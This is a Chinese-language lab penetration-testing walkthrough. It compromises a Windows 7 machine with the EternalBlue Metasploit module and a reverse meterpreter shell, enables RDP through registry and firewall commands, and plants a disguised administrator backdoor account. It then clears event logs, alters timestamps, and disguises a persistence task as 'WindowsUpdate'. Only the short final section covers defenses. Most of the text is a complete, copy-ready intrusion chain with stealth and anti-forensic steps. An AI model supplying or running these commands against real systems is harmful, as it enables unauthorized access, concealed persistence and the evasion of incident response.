1. 靶场环境搭建与基础配置在开始实战演练之前我们需要先搭建一个标准的渗透测试环境。这个环境由两台虚拟机组成攻击机使用Kali Linux 2023.2版本IP地址设置为192.168.25.130靶机使用Windows 7 SP1企业版IP地址为192.168.25.132。建议将两台机器都设置为桥接网络模式确保它们处于同一局域网段。我建议在VMware Workstation中为靶机创建一个快照标记为初始状态。这样在每次实验完成后可以快速恢复到干净状态。同时记得关闭Windows防火墙和自动更新服务避免干扰实验过程。在实际渗透测试中这些防护措施是需要逐步绕过的但作为教学演示我们先简化环境配置。2. 利用永恒之蓝漏洞获取初始Shell永恒之蓝MS17-010是Windows SMB协议的经典漏洞虽然已经过去多年但在内网渗透中仍然具有重要价值。在Kali中启动Metasploit框架依次执行以下命令msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.25.132 set payload windows/x64/meterpreter/reverse_tcp set LHOST 192.168.25.130 exploit成功执行后我们会获得一个meterpreter会话。这里有个实用技巧立即执行getuid命令查看当前权限级别。如果是普通用户权限需要先进行提权操作。我常用的方法是getsystem如果提权失败可以尝试使用post/multi/recon/local_exploit_suggester模块寻找合适的本地提权漏洞。获得system权限后建议先执行sysinfo记录靶机系统信息这对后续操作很有帮助。3. 命令行开启3389远程桌面服务在meterpreter会话中输入shell进入命令行界面。首先检查3389端口是否已经开放netstat -ano | find 3389如果没有任何输出说明远程桌面服务未开启。我们需要通过注册表修改来启用它。这里提供两种我实测有效的方法方法一使用WMIC命令wmic RDTOGGLE WHERE ServerName%COMPUTERNAME% call SetAllowTSConnections 1方法二修改注册表键值REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 0 /f执行成功后建议再次确认端口状态。有时候还需要检查防火墙规则可以运行netsh advfirewall firewall add rule nameRemote Desktop dirin protocoltcp localport3389 actionallow4. 创建隐蔽用户并提权直接创建新用户容易被发现我推荐先检查现有用户列表net user然后创建一个看似正常的用户名比如backupadminnet user backupadmin Pssw0rd123 /add net localgroup administrators backupadmin /add更隐蔽的做法是克隆现有用户。首先查看注册表中的用户SIDwmic useraccount get name,sid然后找到类似500的管理员账户SID将其权限克隆到新建账户。这个操作需要修改注册表具体步骤较为复杂建议新手先掌握基础方法。5. 使用Kali工具建立图形化连接Kali Linux自带了多个RDP客户端工具我最常用的是xfreerdp。基本连接命令如下xfreerdp /u:backupadmin /p:Pssw0rd123 /v:192.168.25.132 /size:90% clipboardclipboard参数启用了剪贴板共享这在渗透测试中非常实用。如果遇到证书错误可以添加/cert:ignore参数。对于高分辨率屏幕建议使用/dynamic-resolution参数让远程桌面自动适应窗口大小。另一个实用工具是rdesktop命令更简洁rdesktop -u backupadmin -p Pssw0rd123 192.168.25.132 -g 90%连接成功后建议立即进行几个关键操作清除事件日志、禁用安全中心通知、设置屏幕保护程序密码。这些操作能延长我们的控制时间。6. 痕迹清理与持久化维持图形化操作会留下大量日志我们需要进行基本清理。在meterpreter会话中clearev还可以使用timestomp修改文件时间戳。为了维持持久访问我通常会创建计划任务schtasks /create /tn WindowsUpdate /tr cmd.exe /c net user backupadmin Pssw0rd123 /add /sc onlogon /ru system这个任务会在每次系统启动时执行确保我们的后门账户不会被删除。更高级的方法是通过WMI事件订阅实现无文件持久化但这需要更深入的系统知识。7. 防御措施与检测方法作为负责任的渗透测试人员我们必须了解如何防御此类攻击。管理员可以采取以下措施定期安装系统补丁启用网络级身份验证(NLA)修改默认3389端口配置账户锁定策略监控异常登录事件在安全设备上建议启用对SMB协议的特殊检测规则并监控异常注册表修改行为。对于3389端口的爆破尝试应该设置自动阻断机制。